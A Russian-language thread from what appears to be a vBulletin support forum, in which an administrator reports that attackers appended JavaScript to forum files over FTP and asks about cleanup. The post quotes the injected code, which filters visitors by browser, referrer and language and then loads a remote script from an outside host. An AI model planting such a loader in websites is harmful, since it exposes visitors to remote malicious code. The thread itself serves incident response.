VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
Коллеги, я в тупике.
При попытке удалять сообщения пользователей вылезает окно
Вы ввели неправильное имя или пароль. бла, бла, бла
Хотя я залогинен. Сбрасывал куки и кеш броузера, но все равно такая вот байда. Одно важное пояснение. Вчера по фтп дописали js код в некоторые файлы, с проблемой вроде справился, но может какой-то важный файл обновил из инсталяционного пакета и так делать нельзя и поэтому вылезает проблема?
нет, такого быть не должно из-за яваскрипта
попробуйте удалить все яваскрипты (ну естессно смотреть и файлы отпродуктов)
и залить новые
+ перезалить все файлы php из дистрибутива вашей версии
опять же если файлы не редактировались
@Unlock
Продвинутый
Join Date: Jun 2009
Posts: 379
Версия vB: 3.8.2
Reputation:
Опытный 31
Репутация в разделе: 11
0
Файлы все перезалил, тут все чисто. Такое ощущение, что с куками проблема. Удалил в броузере куки и кеш, вроде сейчас удалось удалить сообщения, не выскочило этой проблемы.
Кстати, если можно, то еще вопрос. После внедрения кода который идет ниже, достаточно ли чтобы пользователи сменили пароли? После того, как вычистил всё, сделал рассылку пользователям, там немного людей могло быть задето, все должны сменить. Или надо еще что-то сделать?
Код:
Code:
var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue;
}
function set_cookie(name, value) {
var cxdate = new Date(); cxdate.setYear(2024); cxdate.setMonth(3); cxdate.setDate(3); document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}
var br_reg = /(Firefox|MSIE|Opera)/i;
var usr_os = navigator.userAgent;
var ref_reg = /(yandex|google|mail|rambler|vk.com)/i;
var ref = document.referrer;
if (ref==null) ref='';
var lang = (navigator.language ||
navigator.systemLanguage ||
navigator.userLanguage ||
'en').substr(0, 2).toLowerCase();
var useragent_reg = /(bot|yandex|yx)/i
var useragent = navigator.userAgent;
if(get_cookie('viewpages') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg) && ref.match(ref_reg) &&
(lang=="ru" || lang=="ua" || lang=="by" || lang=="kz") && (!useragent.match(useragent_reg)) )
{
var script = document.createElement('script');
script.src = 'http://grandsteel.kz/stats.php';
document.head.appendChild(script);
set_cookie('viewpages', '8ihdf8hiio9000yud9');
};
Luvilla
Гость
Posts: n/a
так...
стрелять говнораскрутчиков....
пиши хозяину сайта, чей домен впёрли в скрипте
примерный текст:
заказывали раскрутку проекта?
довожу до вашего сведения, что раскрутка проводится хакеркими методами, путём взлома чужих проектов и добавления вредоносного кода
что является уголовно наказуемым действием как на территории РФ, так и Казахстана
хотите пойти соучастником?
и требуй компенсации за нервотрёпку и беспокойство для юзеров
с учётом медицинской тематики твоего форума, тексту можно написать - мало не покажется
грози писать хостеру, регистратору домена и в правоохранительные органы
а, да, и обязательно пригрози пожаловаться в Гугл и Яндекс, что их выкинут вообще из выдачи, за такие методы
@Unlock
Продвинутый
Join Date: Jun 2009
Posts: 379
Версия vB: 3.8.2
Reputation:
Опытный 31
Репутация в разделе: 11
0
Знаешь, я вот не уверен, что ситуация именно так обстоит. Ведь что там php файл делает, не известно. Может их самих ломанули и подсунули скрипт, которые еще дальше данные отправляет. Смущает вот что, я им написал, что типа вас взломали, проверьте файл и попросил этот скрип прислать. В ответ молчок. Может и правда они причем... Попробую еще раз написать.
Unlock добавил 29.01.2013 в 14:16
Кстати топорная работа. Вобла сразу затупила от вставки по все js левого кода. Если бы я еще не затупил и не хостеру писал вопросы, меняли ли они что-то на сервере и проверил файлы... Поставлю на днях файл инспектор, должен помочь в обнаружении подобной хрени.
Last edited by Unlock : 01-29-2013 at 04:16 PM.
Reason: Добавлено сообщение
kerk
k0t
Join Date: May 2005
Location: localhost
Posts: 28,712
Версия vB: 3.8.x
Пол:
Reputation:
Гуру 20257
Репутация в разделе: 8432
0
но ведь как то же пробрались на сервак?
ок, сиюминутную проблему решили, но нужно искать дырку на сервере и/или в хаках для воблы
вполне возможно, что троянец на компе одного из админов и/или тех, кто имеет доступ к серверу
@Unlock
Продвинутый
Join Date: Jun 2009
Posts: 379
Версия vB: 3.8.2
Reputation:
Опытный 31
Репутация в разделе: 11
0
Quote:
Originally Posted by kerk
но ведь как то же пробрались на сервак?
Руками или думаю скриптом, заход по ФТП и вставка js кода в конец файлов. Вход был под логином данные по которому были у троих человек, кроме меня. Один из них мой знакомый, второго практически не знаю, третьи - суппорт CMS. От них и утек, если исходить из того, что у меня вирей нет. Я знаю что лох. Надо было сменить пароль, после того, как люди выполнили свою работу. Так же как и ftpaccess вернуть, но затупил. :(
Quote:
Originally Posted by kerk
троянец на компе одного из админов и/или тех, кто имеет доступ к серверу
Не с моего IP был вход по ФТП. С сервака mchost.
Хаки новые давно уже не ставил, так что дыра в вобле, это маловероятно. Вычистил вчера все, до сего момента повторного заражения не произошло.